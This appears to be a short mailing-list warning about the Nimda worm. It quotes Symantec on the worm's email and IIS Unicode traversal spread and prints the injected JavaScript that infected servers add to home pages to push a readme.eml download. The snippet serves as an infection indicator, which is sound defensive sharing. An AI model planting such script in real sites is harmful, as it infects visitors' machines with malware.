Looks like a new virus called "W32.Nimda.A@mm" a variant on the proof of
concept code blue worm.

This virus has a two prong attack one via E-mail and via the Unicode Web
Traversal exploit.

"the worm sends out probes to IIS servers attempting to spread by using the
Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised
servers may display a web page prompting a visitor to download an Outlook
file which contains the worm as an attachment." - Symantec
http:[EMAIL PROTECTED]
http://securityresponse.symantec.com/avcenter/venc/data/w32.bluecode.worm.ht
ml

Very little is know about the new W32.Nimda.A@mm virus.  Here is what I see.

If infected your webserver will include this text at the bottom of the home
page:

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>

This JS will prompt you to download a file by the name of readme.eml which
contains the worm as an attachment.

This ia all I know now....

Mark W. Breneman
-Cold Fusion Developer